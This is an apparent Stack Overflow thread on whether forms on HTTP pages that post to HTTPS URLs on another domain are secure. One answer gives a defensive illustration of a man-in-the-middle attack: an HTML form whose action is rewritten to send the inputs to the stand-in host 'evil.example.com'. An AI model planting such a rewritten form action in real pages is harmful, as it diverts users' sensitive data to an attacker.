# Are forms submitted cross domain secure?

Tags: html, forms, security

I have a site, http://foo.com. I have another site, https://bar.com. If I submit a form from non-secured foo.com to secured bar.com, is the transaction encrypted?

Example:

```
http://foo.com/form.html

<form action="https://bar.com/process.php" method="post">
...inputs, validation, and form happiness...
</form>
```

My use case is forms emailed to users that may contain sensitive information that need to be submitted to our site (which has SSL). The form would be an attachment that would be opened from their desktop for example and filled out, then submitted to our server. Is there a way to encrypt that communication?

I found two potentially relevant questions, which give conflicting answers:

1. [Secure Cross Domain Form Submission](https://stackoverflow.com/questions/5809338/secure-cross-domain-form-submission)

   > [yes, it is secure, but] Not inherently secure. The SSL on the host is not relevant, the SSL on the third party server is. However you must set the post to "https://..." rather than just "http://", it isn't enough for it to be a "secure server" you have to invoke it securely.
2. [Securing Forms submitting to a diffrent domain](https://stackoverflow.com/questions/6463766/securing-forms-submitting-to-a-diffrent-domain)

   > One simple way is to use HTTPS and but thats as long as both can be HTTPS. They must also both have SSL certificates.

Answer (score 1, accepted):

Since the form is going to be posted to a secure server https://bar.com/process.php, data will be encrypted along with the request. On the other hand it wouldnt be secure even if the form had been hosted on a secured https://bar.com/form.html but had been posted to a non secure http://foo.com/process.html

Here's excerpt from the article "Sending form data" on Mozilla Developer Network

> Note: It's possible to specify a URL that uses the HTTPS (secure HTTP)
>   protocol. When you do this, the data is encrypted along with the rest
>   of the request, even if the form itself is hosted on an insecure page
>   accessed using HTTP. On the other hand, if the form is hosted on
>   secure page but you specify an insecure HTTP URL with the action
>   attribute, all browsers display a security warning to the user each
>   time they try to send data because the data will not be encrypted.
>   ref: [Sending form data: MDN Article](https://developer.mozilla.org/en-US/docs/Web/Guide/HTML/Forms/Sending_and_retrieving_form_data)

Answer (score 1):

Yes, it is encrypted. No, it is not secure.

The reason being is that the user has no assurance that the form is secure. A Man-In-The-Middle could have intercepted the response from `http://foo.com` and changed the form to:

```
<form action="https://evil.example.com/process.php" method="post">
...inputs, validation, and form happiness...
</form>
```

and the user would be none the wiser that they were sending insecure data until after the horse had bolted. `evil.example.com` may redirect back to `https://bar.com` to decrease their chances of detection.

Bottom line: Always place sensitive forms on HTTPS pages. This gives assurance to the user that their submitted data will be safe in transit.

Comment: Does that mean that if I have a form on a HTTPS site and my processing page (which is also HTTPS) is on a completely different domain, the data be secure?

For example: https://example.com has a form with action="https://processingpage.com" is there any risk with the data that is sent from the form?

Can it be intercepted? Does it have to be encrypted?